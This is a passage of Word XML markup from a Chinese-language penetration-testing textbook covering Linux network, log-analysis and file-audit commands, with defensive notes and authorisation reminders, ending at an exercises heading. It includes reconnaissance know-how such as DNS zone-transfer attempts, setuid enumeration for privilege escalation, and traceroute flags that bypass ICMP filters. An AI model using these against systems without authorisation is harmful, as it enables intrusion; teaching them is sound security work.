        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">traceroute &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tracert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）：探测三层路径。注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（UDP）参数可绕过仅过滤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询，侦察阶段用于收集域名、MX、NS、TXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，也用于验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送漏洞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig axfr @&lt;DNS_SERVER&gt; &lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可尝试区域传送，但必须在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围内执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：查看本机监听端口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队应周期审计生产系统监听端口的预期性，非预期监听进程可能是后门①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文本处理与日志分析“瑞士军刀”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：日志与输出过滤核心。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -iE "(error|fail|exception)" /var/log/syslog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对日志做模式匹配。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v "^#"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤配置文件的注释行。攻击者会试图通过特殊编码混淆日志中的字符串，防御方需使用规范化预处理后再</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">awk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：列处理。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">awk '{print $1,$4,$7}' access.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache/Nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、时间、请求路径。蓝队可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">awk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">聚合访问频次：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">awk '{count[$1]++} END {for (ip in count) print ip, count[ip]}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以发现高频访问异常①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：流编辑器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -n '/pattern/p'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出匹配行，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sed 's/pattern/replacement/g'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">做字符串替换。在靶机操作中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可用于批量修改配置文件（如在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中切换安全级别对应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config.inc.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值）①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sort | uniq -c | sort -rn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提取字段、去重排序以发现日志模式。这是手工分析威胁活动中最常用的管道组合之一①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文件与权限审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：文件搜索。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> setuid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制文件——这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升的经典侦察命令。setuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制文件的原理已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（进程与权限）讲解，此处为攻防场景直接应用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：查看文件权限与属性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间戳（mtime/atime/ctime），攻击者在后渗透阶段常使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">touch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">篡改这些时间戳以反取证。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队应监控关键系统文件的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间变更，尤其是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下的异常修改①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：修改权限与所属者。渗透测试中禁止在授权范围外的系统上执行这些写操作。仅在自建靶机上练习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络嗅探与注入基础</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：命令行抓包。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump -i eth0 -n port 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抓取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口的流量，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-w capture.pcap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保存为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pcap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">离线分析。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队可在交换机镜像端口部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Zeek </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行全量流量采集，为事后取证提供依据①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（复习部分）：作为全书最重要的侦察工具，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将在卷二详细展开。此处仅复习基础扫描类型：SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（需</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限）、版本探测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、操作系统指纹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在授权测试中使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调整扫描速度时需符合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的禁止动作条款——过高频率扫描可能被视为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络命令的底层协议栈原理（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三次握手、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求/应答、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由表、NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转换表）已由《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章教授，本书后续章节的网络侦察与利用均直接建立在这些原理之上。本节所有网络命令的使用均直接建立在这些原理之上，读者如遇协议层面的疑问，请回指馆藏相关章节。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="习题-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本组习题围绕</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
